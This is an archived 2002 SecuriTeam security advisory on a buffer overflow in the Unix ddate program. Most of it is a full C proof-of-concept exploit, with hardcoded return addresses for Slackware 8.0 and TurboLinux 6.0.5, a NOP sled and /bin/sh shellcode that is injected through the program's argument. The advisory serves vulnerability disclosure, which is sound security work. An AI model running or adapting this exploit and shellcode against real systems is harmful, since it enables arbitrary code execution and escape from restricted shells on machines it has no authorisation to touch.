[UNIX] DDate Proof Of Concept Exploit and Bug details

From: support@securiteam.com
Date: 04/17/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 17 Apr 2002 18:53:13 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  DDate Proof Of Concept Exploit and Bug details
------------------------------------------------------------------------

SUMMARY

DDate is a program installed by default, on many Linux distributions. Its
convert Gregorian Dates to Discordian Dates. A security vulnerability in
it allows attackers to execute arbitrary code by overflowing an internal
buffer in the program.

DETAILS

Vulnerable systems:
 * Slackware 8.0
 * TurboLinux 6.0.5

Risk:
Low. User can obtain an Normal (SH)ell, the user can leave a Restricted
Shell an obtain an unrestricted shell

The ddate program does not check the variable length, this allows us to
overflow the internal buffer by issuing this command:
        
     ddate +[STRING >420 Size]

on Slackware 8.0 a size bigger than 420 will overwrite the EIP, so we can
execute commands.

On Turbolinux 6.0.5 the buffer is 5 bytes less, with 415 we will overwrite
the EIP.

Exploit:
/* /usr/bin/ddate Xploit , Proof of Concept
    
   Os: Linux - Most Distros, this xploit is best working with Slackware
8.0 and
       TurboLinux 6.0.5, but you may try on another distros if you
       get the Ret Address, or do a Offset brute force.
               
  Author: Costantino Leandro le_costantino@ciudad.com.ar
  
  Risk: Low, is not suid, user can leave an restricted shell and obtain a
        'new' sh shell.

  Date: 30/03/2001
*/

  
#include <stdlib.h>

//Buffer Size 420 + 100 (100 more to have more chance to exploit it)

#define buffer_size 520

//On Turbolinux buffersize is 515

#define turbo_size 515

//This are the possibles RET address i found to exploit it */
//Sometimes you will use RET1, sometimes RET2, etc.
//
#define RET 0xbfffe5ed /*On Slackware 8.0 */
#define RET2 0xbfffd477
#define RET3 0xbffff9ac
#define RET4 0xbffff64d

//For TurboLinux 6.0.5, possibles RET addrees to exploit it
//
#define RET5 0x7ffffb74
#define RET6 0x7ffffba1
#define RET7 0x7ffffb6a
#define RET8 0x7ffffb4c

#define doffset 0
#define NOP 0x90

char operador[]='+';

unsigned long get_sp(void)
{
   __asm__('movl %esp,%eax');
}
char shellcode[] =
      '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b'
      '\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd'
      '\x80\xe8\xdc\xff\xff\xff/bin/sh';

void help()
{
printf('#####################################################\n');
printf('DDATE Xploit (Slackware 8.0/TurboLinux 6.0.5)\n');
printf('--------------------------------------------------\n');
printf('Use: ./dxploit RET-Selection Offset (default 0)\n');
printf('--------------------------------------------------\n');
printf('RET-Selection:

Slackware 8.0 Turbolinux 6.0.5

1 0xbfffe5ed 5 0x7ffffb74
2 0xbfffd477 6 0x7ffffba1
3 0xbffff9ac 7 0x7ffffb6a
4 0xbffff64d 8 0x7ffffb4c
      
0 Get current address (for other distros) use with differents offsets\n');

printf('###########################################################\n\n');
exit(1);
}
main(int argc, char *argv[])
{
int offset = doffset;
int bsize = buffer_size;
long *pointer_addr;
   long address;
   char *data_string,*point;
char codex[bsize + 1];
int elejido;
   int i;
   
   
memset(codex,0x00,sizeof(codex));

   if(argc>1) { elejido = atoi(argv[1]) ;
}
   else {
help();
   }
if(argc>2) { offset=atoi(argv[2]);
}
   switch(elejido)
     {
      case 0:
  address = get_sp() - offset;
      case 1:
          address = RET - offset;
  break;;
      case 2:
address = RET2 - offset;
        break;;
      case 3:
address = RET3 - offset;
        break;;
case 4:
address = RET4 - offset;
        break;;
//Turbolinux Address
case 5:
address = RET5 - offset;
        break;;
case 6:
address = RET6 - offset;
        break;;
case 7:
address = RET7 - offset;
        break;;
case 8:
address = RET8 - offset;
        break;;
      default:
   help();
   printf('Error: Not a Valide Ret Selection, must be 1 to 8\n');
   exit(1);

     }

   //Change the buffer size if TurboLinux Address Selected

   if(elejido >=5 )
     {
bsize=turbo_size;
     }
     if(!(data_string=malloc(bsize))){
          printf('cannot allocate memory\n');
          exit(1);
   }
   
   

printf('########################################\n');
printf('DDATE Xploit (Slackware 8.0)\n');
printf('Using address= %x\n',address);
printf('Offset = %d\n',offset);
printf('Type ./dxploit for help\n');
printf('########################################\n\n');

   point = data_string;

   pointer_addr = (long *)point;

   for(i=0;i < bsize ; i+=4)
     *(pointer_addr++) = address;

   for(i=0; i < bsize/2; i++)
     data_string[i] = NOP;
   
   point = data_string + ((bsize/2) - (strlen(shellcode)/2));
   
   for(i=0;i < strlen(shellcode); i++)
     *(point++) = shellcode[i];
   
      data_string[bsize - 1] = '\0';

//We need to execute the args +data_string, so i concatenate the '+' and
the
//data_string on codex variable

     strcat(codex,operador);
        strcat(codex,data_string);

// Same as ddate +[string]
   execl('/usr/bin/ddate','ddate',codex,0);

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:le_costantino@ciudad.com.ar>
Costantino Leandro.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages